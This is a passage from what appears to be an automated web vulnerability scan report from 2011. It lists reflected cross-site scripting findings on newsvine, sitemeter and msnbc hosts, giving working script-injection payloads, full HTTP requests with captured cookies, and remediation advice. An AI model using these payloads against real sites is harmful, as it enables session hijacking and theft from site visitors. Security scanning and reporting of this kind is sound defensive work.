This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?af369"-alert(1)-"8df14796428=1 HTTP/1.1 Host: redtape.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:18:30 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=ad5ff547f0b671d901b18e62c2d4a6f5; expires=Sat, 25-Jan-2031 02:18:30 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 65874
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0dde'%3balert(1)//a0f43fc652c was submitted in the site parameter. This input was echoed as c0dde';alert(1)//a0f43fc652c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.asp?site=s18neumediac0dde'%3balert(1)//a0f43fc652c HTTP/1.1 Host: s18.sitemeter.com Proxy-Connection: keep-alive Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 01:50:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7304 Content-Type: application/x-javascript Expires: Sun, 30 Jan 2011 02:00:20 GMT Set-Cookie: IP=173%2E193%2E214%2E243; path=/js Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acf87'%3balert(1)//d9b40ce8ee5 was submitted in the site parameter. This input was echoed as acf87';alert(1)//d9b40ce8ee5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.js?site=s18neumediaacf87'%3balert(1)//d9b40ce8ee5 HTTP/1.1 Host: s18.sitemeter.com Proxy-Connection: keep-alive Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 01:50:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7304 Content-Type: application/x-javascript Expires: Sun, 30 Jan 2011 02:00:18 GMT Set-Cookie: IP=173%2E193%2E214%2E243; path=/js Cache-control: private
var g_sLastCodeName = 's18neumediaacf87';alert(1)//d9b40ce8ee5'; // ]]> ...[SNIP]...
5.224. http://suzanne-choney.newsvine.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://suzanne-choney.newsvine.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a101"-alert(1)-"af1288a8236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?8a101"-alert(1)-"af1288a8236=1 HTTP/1.1 Host: suzanne-choney.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:19:53 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=6bd6099d7f38f27c6294da411be59d89; expires=Sat, 25-Jan-2031 02:19:53 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 80023
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
5.225. http://technolog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ad7a"><script>alert(1)</script>5aa1ea45b3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?4ad7a"><script>alert(1)</script>5aa1ea45b3a=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:36:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 144003
5.226. http://technolog.msnbc.redacted/_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3e23"><script>alert(1)</script>62f3033b750 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch?f3e23"><script>alert(1)</script>62f3033b750=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 18:26:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 158035
<!DOCTYPE HTML> <html lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <title>Technolog - Apple would u ...[SNIP]... <input type="hidden" name="redirect" value="http://technolog.msnbc.redacted/_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch?f3e23"><script>alert(1)</script>62f3033b750=1" /> ...[SNIP]...
5.227. http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1306"><a>02312887712 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing-?a1306"><a>02312887712=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 18:23:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56942
5.228. http://technolog.msnbc.redacted/_news/2010/08/26/4975799-big-facebook-sues-little-teachbook [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7447d"><a>65bfd247cb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /_news/2010/08/26/4975799-big-facebook-sues-little-teachbook?7447d"><a>65bfd247cb9=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 18:25:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 97573
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b45d"><script>alert(1)</script>9351ab4d91b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /_nv/more/section4b45d"><script>alert(1)</script>9351ab4d91b/archive HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:06:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 243794
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc67a"><script>alert(1)</script>e360a73df87 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /_nv/more/section/archivebc67a"><script>alert(1)</script>e360a73df87 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=299 Date: Sun, 30 Jan 2011 03:06:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 243794
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload b7e29<img%20src%3da%20onerror%3dalert(1)>626a72a1b57 was submitted in the path parameter. This input was echoed as b7e29<img src=a onerror=alert(1)>626a72a1b57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:34:46 GMT Connection: close Content-Length: 529
5.232. http://technolog.msnbc.redacted/amazon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/amazon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebb0d"><script>alert(1)</script>11a092cdb61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /amazon?ebb0d"><script>alert(1)</script>11a092cdb61=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:00:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 126981
5.233. http://technolog.msnbc.redacted/app-store [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/app-store
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de647"><script>alert(1)</script>42a1c3fcb72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /app-store?de647"><script>alert(1)</script>42a1c3fcb72=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 18:54:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 166597
5.234. http://technolog.msnbc.redacted/blackberry [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/blackberry
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71720"><script>alert(1)</script>843771bf362 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blackberry?71720"><script>alert(1)</script>843771bf362=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:58:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 120997
5.235. http://technolog.msnbc.redacted/ces-2011 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/ces-2011
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61aa0"><script>alert(1)</script>3a7cba410e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ces-2011?61aa0"><script>alert(1)</script>3a7cba410e1=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:58:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 117324
5.236. http://technolog.msnbc.redacted/citizen-gamer [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/citizen-gamer
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a859"><script>alert(1)</script>8ee81155fd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /citizen-gamer?1a859"><script>alert(1)</script>8ee81155fd4=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=299 Date: Sun, 30 Jan 2011 02:44:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 153941
5.237. http://technolog.msnbc.redacted/facebook [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/facebook
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28f76"><script>alert(1)</script>f73888e7cc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /facebook?28f76"><script>alert(1)</script>f73888e7cc2=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=299 Date: Sun, 30 Jan 2011 02:38:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127240
5.238. http://technolog.msnbc.redacted/featured [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/featured
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18c2b"><script>alert(1)</script>03f1adeb751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /featured?18c2b"><script>alert(1)</script>03f1adeb751=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:39:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 139069
5.239. http://technolog.msnbc.redacted/google [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technolog.msnbc.redacted
Path:
/google
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71cf2"><script>alert(1)</script>12874fc86d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
